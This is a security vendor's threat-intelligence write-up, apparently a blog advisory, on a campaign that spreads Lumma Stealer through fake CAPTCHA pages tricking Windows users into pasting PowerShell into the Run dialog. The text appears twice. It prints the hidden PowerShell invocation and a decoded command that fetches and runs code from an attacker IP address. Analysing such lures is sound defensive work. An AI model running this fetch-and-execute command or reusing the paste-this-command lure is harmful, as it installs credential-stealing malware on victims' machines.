Unmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages
The Lumma Stealer malware is being distributed through deceptive human verification pages that trick users into running malicious PowerShell commands. This phishing campaign primarily targets Windows users and can lead to the theft of sensitive information
A new and sophisticated method of distributing Lumma Stealer malware has been uncovered, targeting Windows users through deceptive human verification pages. This technique, initially discovered by Unit42 at Palo Alto Networks, has prompted further investigation into similar malicious sites.
After our investigation, we have identified more active malicious sites spreading the Lumma Stealer. It's important to note that while this technique is currently being used to distribute Lumma Stealer, it could potentially be leveraged to deliver any type of malicious malware to unsuspecting users.
Flow of the Phishing Campaign and Malware Infection
Analysis and Attribution
Modus Operandi
Threat actors create phishing sites hosted on various providers, often utilizing Content Delivery Networks (CDNs). These sites present users with a fake Google CAPTCHA page.
Upon clicking the "Verify" button, users are presented with unusual instructions:some text
Open the Run dialog (Win+R)
Press Ctrl+V
Hit Enter
Unbeknownst to the user, this action executes a hidden JavaScript function that copies a base64-encoded PowerShell command to the clipboard.
The PowerShell command, when executed, downloads the Lumma Stealer malware from a remote server.
Technical Analysis
Our research team identified multiple domains hosting these malicious verification pages. The infection chain typically follows this pattern:
User visits the fake verification page
Phishing Page Prompting deceptive Google Captcha Verification prompt
PowerShell script is copied on the clipboard via the Clicking on the “I’m not a robot” button. Once inspecting the source code of the phishing sites can also reveal the command which is being copied.
Verifications steps asked by the deceptive sites
Once the user pastes the PowerShell command into the Run dialog box, it will run PowerShell in a hidden window and execute the Base64-encoded command: powershell -w hidden -eC
The decoded Base64 command, iex (iwr http://165.227.121.41/a.txt -UseBasicParsing).Content, will fetch the content from the a.txt file hosted on the remote server. This content will then be parsed and executed using Invoke-Expression.
Further commands on a.txt to download the malicious file
If the downloaded file(dengo.zip) is extracted and executed on a Windows machine, the Lumma Stealer will become operational and establish connections with attacker-controlled domains.
Notable Observations
Malicious pages were found on various platforms, including Amazon S3 buckets and CDN providers
The use of base64 encoding and clipboard manipulation demonstrates the attackers' efforts to evade detection
The initial executable often downloads additional components, complicating analysis and potentially allowing for modular functionality
Although this campaign primarily targets distributing Lumma Stealer malware, it has the potential to deceive users into downloading various types of malicious files onto their Windows devices.
Recommendations
Educate Employees/Users about this new social engineering tactic, emphasizing the danger of copying and pasting unknown commands.
Implement and maintain robust endpoint protection solutions capable of detecting and blocking PowerShell-based attacks.
Monitor network traffic for suspicious connections to newly registered or uncommon domains.
Regularly update and patch all systems to mitigate potential vulnerabilities exploited by the Lumma Stealer malware.
Unmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages
The Lumma Stealer malware is being distributed through deceptive human verification pages that trick users into running malicious PowerShell commands. This phishing campaign primarily targets Windows users and can lead to the theft of sensitive information
Get the latest industry news, threats and resources.
Category: Adversary Intelligence
Industry: Multiple
Motivation: Cyber Crime/Financial
Region: Global
TLP: GEEEN
Executive Summary
A new and sophisticated method of distributing Lumma Stealer malware has been uncovered, targeting Windows users through deceptive human verification pages. This technique, initially discovered by Unit42 at Palo Alto Networks, has prompted further investigation into similar malicious sites.
After our investigation, we have identified more active malicious sites spreading the Lumma Stealer. It's important to note that while this technique is currently being used to distribute Lumma Stealer, it could potentially be leveraged to deliver any type of malicious malware to unsuspecting users.
Flow of the Phishing Campaign and Malware Infection
Analysis and Attribution
Modus Operandi
Threat actors create phishing sites hosted on various providers, often utilizing Content Delivery Networks (CDNs). These sites present users with a fake Google CAPTCHA page.
Upon clicking the "Verify" button, users are presented with unusual instructions:some text
Open the Run dialog (Win+R)
Press Ctrl+V
Hit Enter
Unbeknownst to the user, this action executes a hidden JavaScript function that copies a base64-encoded PowerShell command to the clipboard.
The PowerShell command, when executed, downloads the Lumma Stealer malware from a remote server.
Technical Analysis
Our research team identified multiple domains hosting these malicious verification pages. The infection chain typically follows this pattern:
User visits the fake verification page
Phishing Page Prompting deceptive Google Captcha Verification prompt
PowerShell script is copied on the clipboard via the Clicking on the “I’m not a robot” button. Once inspecting the source code of the phishing sites can also reveal the command which is being copied.
Verifications steps asked by the deceptive sites
Once the user pastes the PowerShell command into the Run dialog box, it will run PowerShell in a hidden window and execute the Base64-encoded command: powershell -w hidden -eC
The decoded Base64 command, iex (iwr http://165.227.121.41/a.txt -UseBasicParsing).Content, will fetch the content from the a.txt file hosted on the remote server. This content will then be parsed and executed using Invoke-Expression.
Further commands on a.txt to download the malicious file
If the downloaded file(dengo.zip) is extracted and executed on a Windows machine, the Lumma Stealer will become operational and establish connections with attacker-controlled domains.
Notable Observations
Malicious pages were found on various platforms, including Amazon S3 buckets and CDN providers
The use of base64 encoding and clipboard manipulation demonstrates the attackers' efforts to evade detection
The initial executable often downloads additional components, complicating analysis and potentially allowing for modular functionality
Although this campaign primarily targets distributing Lumma Stealer malware, it has the potential to deceive users into downloading various types of malicious files onto their Windows devices.
Recommendations
Educate Employees/Users about this new social engineering tactic, emphasizing the danger of copying and pasting unknown commands.
Implement and maintain robust endpoint protection solutions capable of detecting and blocking PowerShell-based attacks.
Monitor network traffic for suspicious connections to newly registered or uncommon domains.
Regularly update and patch all systems to mitigate potential vulnerabilities exploited by the Lumma Stealer malware.